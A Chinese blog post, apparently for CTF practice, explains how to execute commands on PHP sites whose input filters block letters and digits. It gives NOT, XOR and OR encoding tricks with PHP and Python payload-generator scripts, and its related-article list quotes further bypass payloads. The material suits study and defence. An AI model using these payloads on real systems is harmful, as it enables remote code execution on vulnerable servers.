RCE绕过之无数字字母getshell

最新推荐文章于 2023-03-29 23:10:18 发布
最新推荐文章于 2023-03-29 23:10:18 发布
阅读量1.8k 收藏 5
点赞数
分类专栏: RCE 文章标签: web 网络安全 RCE
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46706771/article/details/119031930
版权

无数字字母getshell

①取反

php可以对汉字取反获得乱码,但大多数会包含一个字母,例如字取反为B_其中第二位就是大写字母B,所以可以通过这种方法获得字母B

这里使用羽师傅的脚本

<?php
//在命令行中运行
/*author yu22x*/
fwrite(STDOUT,'[+]your function: ');
$system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN)); 
fwrite(STDOUT,'[+]your command: ');
$command=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN)); 
echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');';
②异或

当过被滤掉字母时,我们可以使用异或运算的方法来拼写字母

var_dump('#'^'|'); //得到字符 _
var_dump('.'^'~'); //得到字符 P    
var_dump('/'^'`'); //得到字符 0    
var_dump('|'^'/'); //得到字符 S    
var_dump('{'^'/'); //得到字符 T    
$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");  //变量$__值为字符串'_POST'

python异或查询脚本

pyhon异或运算转换脚本

③或运算

原理与异或相同

这里使用猫神师傅的脚本

# 或运算脚本
def solve3(CODE):
    l = 'abcdefghijklmnopqrstuvwxyz'
    n = '0123456789'
    operation = input("Operation:")
    front = ""
    after = ""
    for i in operation:
        if i.isalpha():
            front += chr(l.index(i) + 1)
            after += chr(64)
        elif i.isdigit():
            front += chr(n.index(i) + 32)
            after += chr(16)
        else:
            front += i
            after += i
    payload = "($_=(\"%13%19%13%14%05%0D\"|\"%40%40%40%40%40%40\")).($__ = \"" + quote(
        front) + "\"" + '|' + "\"" + quote(after) + "\").($_($__));"
    print('payload:' + payload)

返回主页

C1yas0
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
网络安全RCE漏洞讲解、绕过方式及实例介绍
等风来
05-13 1017
4、passthru():能将字符串作为OS命令执行,只调用命令不返回任何结果,但把命令的运行结果原样输出到标准输出设备上;6、call_user_func_array():回调函数,第一个参数为函数名,第二个参数为函数参数的数组。2、exec():能将字符串作为OS命令执行,但是只返回执行结果的最后一行(约等于无回显)5、call_user_func():回调函数,第一个参数为函数名,第二个参数为函数的参数。1、system():能将字符串作为OS命令执行,且返回命令执行结果;
字母数字rce(ctfshow web入门56)
L1ni01
11-01 3514
字母数字rce(ctfshow web入门56) 我们根据这一题直接进入主题 //web56 <?php // 你们在炫技吗? if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){ system($c); } }else{ highlight_file(__FILE__); } 过滤
thinkphp 5.0.3 rce getshell_关于ThinkPHP的一些渗透方式
weixin_39879674的博客
11-22 1776
ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,可以支持Windows/Unix/Linux等服务器环境,正式版需要PHP5.0以上版本支持,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展。Runtime日志在ThinkPHP3的版本中,入口文件index.php是跟应用目录、框架目录在同一个目录下的,在DEBUG开启的状态下,会在runtime生成日志文件,...
getshell不用英文数字 或者不用下划线
weixin_30260399的博客
11-10 193
getshell不用英文字母数字 上代码 实际代码没有echo strlen($code);我测试的时候加上去的 思路是eval执行getFlag函数。 过滤了字母数字,长度得小于40 直接看payload吧: ?code=$_="`{{{"^"?<>/";${$_}[_](${$_}[__]);&_=getFlag 这里给大家说说我的疑惑: ①$...
php 字母递增,Antctf杂项-无数字字母 GETSHELL多种方式
weixin_26704651的博客
03-12 315
原标题:Antctf杂项-无数字字母 GETSHELL多种方式在前几天刚举办完成的Antctf,团队成员糖醋排骨师傅完成了一道杂项题,这次比赛题目思路很新颖,属实很有意思。下面是misc2-shellgen2,通过提交py脚本绕过waf从而getflag,这类misc倒是很少见。 三种方法:异或,取反,a自增异或测试两者ASCII码转成二进制,两者进行异或,出字母 这个会输出 o,这就代表了能够...
浅谈无数字字母shell
记录学习,一起进步
03-29 432
浅谈无数字字母shell【PHP】
利用非文字和非正常符号getshell
awanawan的博客
09-29 459
利用特殊字符getshell此类题目思路 利用特殊字符getshell: <?php ini_set("display_errors", "On"); error_reporting(E_ALL | E_STRICT); if(!isset($_GET['c'])){ show_source(__FILE__); die(); } function rand_string( $l...
记一次tp5.0.24 getshell1
08-03
然而,我们发现了一个有趣的漏洞,即使TP5.0.24没有RCE漏洞,但是我们仍然可以使用EXP来getshell。 EXP的原理是利用ThinkPHP框架的__construct方法来执行恶意代码。在TP5.0.24中,我们可以使用EXP来执行phpinfo()...
异或脚本rce题目绕过正则表达式必备
12-28
字符串转换成异或型,用于rce绕过正则表达式
Maccms8RceBypass_horsen9f_getshell_MacCMSgetshell_菜刀工具mac_eateni
09-11
【标题】"Maccms8RceBypass_horsen9f_getshell_MacCMSgetshell_菜刀工具mac_eateni" 提供的是针对MacCMS 8.0版本的一个远程代码执行(RCE)漏洞利用工具,由'horsen9f'开发,并通过'mac_eateni'进行分享。...
Web安全 _ 无字母数字Webshell 总结.pdf
09-06
然而,这种防护策略可以通过巧妙的编码转换和利用其他非字母数字字符来绕过。 首先,要理解无字母数字Webshell的核心思想。如描述中提到的示例代码,它限制了`shell`参数中不能含有字母数字。但只要我们能找到...
tongda_oa_rce:通达oa越权登录+文件上传getshell
03-20
通达OA越权登录+文件上传getshell 用法 点安装-r requirements.txt python tongda.py url.txt:测试url,支持批量 shell.txt:上传成功的webshel​​l cookie.txt:登录成功的cookie webshel​​l密码a 已测试...
字母数字webshell
weixin_43940853的博客
02-29 1723
构造无数字字母webshell 1.异或 可以看到将A和?进行异或可以得到~ 异或的过程就是将字符转化为ascii,再变为二进制进行异或 这里就是将"A"的Ascii码的二进制与"?"的Ascii码的二进制进行异或得到一个新的二进制,在变为Ascii码,最后在变为字符,也就是~ 首先我们实现构造assert($_POST[_]); <?php for ($i=0; $i < 256...
字母数字绕过正则表达式总结(含上传临时文件、异或、或、取反、自增脚本
热门推荐
羽的博客
10-18 1万+
题目例子 <?php error_reporting(0); highlight_file(__FILE__); $code=$_GET['code']; if(preg_match('/[a-z0-9]/i',$code)){ die('hacker'); } eval($code); 我们下面以命令system('ls')为例 一、异或 <?php /*author yu22x*/ $myfile = fopen("xor_rce.txt", "w"); $contents="
字母数字RCE与LD_PRELOAD绕disable_functions
D.MIND 的博客
04-19 1070
<?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long."); }
Suctf知识记录&&PHP代码审计,无字母数字webshell
weixin_30892889的博客
09-14 932
Checkin .user.ini构成php后门利用,设置auto_prepend_file=01.jpg,自动在文件前包含了01.jpg,利用.user.ini和图片马实现文件包含+图片马的利用. 而.htacess构造后门是通过上传.htaccess设置AddType application/x-httpd-php .jpg,将jpg文件作为php解析,getshell Ea...
涨姿势:抛弃字母数字和下划线写SHELL
weixin_30872337的博客
04-29 192
PHP中异或 (^) 的概念 &lt;?php echo"A"^"?";?&gt; &lt;?php echo"A"^"?";?&gt; 输出的结果是字符 “~”,这是因为代码对字符 “A” 和字符 “?” 进行了异或操作。在 PHP 中两个变量进行异或时,会先将字符串转换成 ASCII 值,再将 ASCII 值转换成二进制再进行异或,异或完又将结果从...
详解PHP代码执行漏洞--无字母shell
贤鱼的博客
09-08 452
介绍代码执行漏洞中无字母shell脚本及其实操过程
thinkphp 5.0.3 rce getshell_TPRCE绕过阿里云防护Getshell
weixin_39706127的博客
11-21 1432
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。0x01 前言这篇文章记录的是笔者在阅读某公众号发布的“记一次对****某校区失败的渗透测试”文章时发现存在漏点,找到目标站点并对原文章作者在Getshell时遇...
rce反弹shell
最新发布
08-05
在实战中,执行简单的id命令可能不足以实现反弹shell。某些情况下,常规的反弹shell命令可能无法成功执行,因为在命令执行时,如果payload中包含&符号,那么payload会被截断。因此,使用类似于"bash -i >&amp...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

C1yas0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值